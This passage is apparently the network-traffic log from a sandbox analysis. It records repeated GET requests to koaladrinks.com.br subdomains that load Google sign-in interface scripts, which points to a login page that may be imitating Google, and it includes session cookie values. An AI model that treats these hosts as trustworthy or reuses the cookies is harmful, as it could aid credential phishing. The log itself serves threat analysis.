Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=Wt6vjf,hhhU8,FCpbqb,WhJNk HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=WW16bk8xhCKjLDzRMeKzleiHWeQ91IpeSlEndb-VpZL_gD5Yk1zwK_l2GrQDgUalD8_AM6emji9sq9EGwuKfaPf88fJvThafZPIhylhin4dskLYLY1kD5NOTq8DD0VvF9XJIuZfO5U2GVyp-Wh9bwFsZBcTa3CrR_i6GMtJcVhv0q92EBc4
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,FCpbqb,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WhJNk,WpP9Yc,Wt6vjf,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,hhhU8,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=jGvTv,PXsWy,OTcFib HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=WW16bk8xhCKjLDzRMeKzleiHWeQ91IpeSlEndb-VpZL_gD5Yk1zwK_l2GrQDgUalD8_AM6emji9sq9EGwuKfaPf88fJvThafZPIhylhin4dskLYLY1kD5NOTq8DD0VvF9XJIuZfO5U2GVyp-Wh9bwFsZBcTa3CrR_i6GMtJcVhv0q92EBc4
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=Wt6vjf,hhhU8,FCpbqb,WhJNk HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=WW16bk8xhCKjLDzRMeKzleiHWeQ91IpeSlEndb-VpZL_gD5Yk1zwK_l2GrQDgUalD8_AM6emji9sq9EGwuKfaPf88fJvThafZPIhylhin4dskLYLY1kD5NOTq8DD0VvF9XJIuZfO5U2GVyp-Wh9bwFsZBcTa3CrR_i6GMtJcVhv0q92EBc4
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=lkWVP3fYTb6No5K28t33KLTJAz6rzi8wdnjs9Q40yNIRPFVTDHY7LYJXJ4ayTicwVFq4nPmmNudajCmGFoHD4PwXYcfvGD-roP2c4yvsifrZzv3dD3oB_2Qv1CD_z3zAxrIstxmapOr4sjpqYwe_VBzwC5LvBOxfGozPicZNq0f1Thq0thJ0KJMi2ik
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,FCpbqb,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,OTcFib,P6sQOc,PHUIyb,PXsWy,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WhJNk,WpP9Yc,Wt6vjf,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,hhhU8,iAskyc,inNHtf,jGvTv,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=GLtV1c,JYtL0c,clOb9b HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=lkWVP3fYTb6No5K28t33KLTJAz6rzi8wdnjs9Q40yNIRPFVTDHY7LYJXJ4ayTicwVFq4nPmmNudajCmGFoHD4PwXYcfvGD-roP2c4yvsifrZzv3dD3oB_2Qv1CD_z3zAxrIstxmapOr4sjpqYwe_VBzwC5LvBOxfGozPicZNq0f1Thq0thJ0KJMi2ik
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,FCpbqb,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WhJNk,WpP9Yc,Wt6vjf,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,hhhU8,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=jGvTv,PXsWy,OTcFib HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=lkWVP3fYTb6No5K28t33KLTJAz6rzi8wdnjs9Q40yNIRPFVTDHY7LYJXJ4ayTicwVFq4nPmmNudajCmGFoHD4PwXYcfvGD-roP2c4yvsifrZzv3dD3oB_2Qv1CD_z3zAxrIstxmapOr4sjpqYwe_VBzwC5LvBOxfGozPicZNq0f1Thq0thJ0KJMi2ik
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,FCpbqb,Fndnac,GLtV1c,I6YDgd,IZT63,JYtL0c,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,OTcFib,P6sQOc,PHUIyb,PXsWy,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WhJNk,WpP9Yc,Wt6vjf,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,clOb9b,f8Gu1e,hc6Ubd,hhhU8,iAskyc,inNHtf,jGvTv,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=k5xHfe,QTENt,ub7VId HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=lkWVP3fYTb6No5K28t33KLTJAz6rzi8wdnjs9Q40yNIRPFVTDHY7LYJXJ4ayTicwVFq4nPmmNudajCmGFoHD4PwXYcfvGD-roP2c4yvsifrZzv3dD3oB_2Qv1CD_z3zAxrIstxmapOr4sjpqYwe_VBzwC5LvBOxfGozPicZNq0f1Thq0thJ0KJMi2ik
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=HLvhr5rChkxrlIAoM6e5z-U14wqN5R-Becd0vAtLvZCKhy7vHUAhIaP-czziDvTiVoYTUEcaPKtZLnyBxGSTNzGDnHE5YF0w1ZPphr5B3gnPLNQDvtfi9eFFoGWFh1E0N5vvKCQNrb96KnC0hpkIfRjh4xKdrxmFnwN_nvOMSN8EQXGTVw
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,FCpbqb,Fndnac,GLtV1c,I6YDgd,IZT63,JYtL0c,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,OTcFib,P6sQOc,PHUIyb,PXsWy,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WhJNk,WpP9Yc,Wt6vjf,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,clOb9b,f8Gu1e,hc6Ubd,hhhU8,iAskyc,inNHtf,jGvTv,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=k5xHfe,QTENt,ub7VId HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: 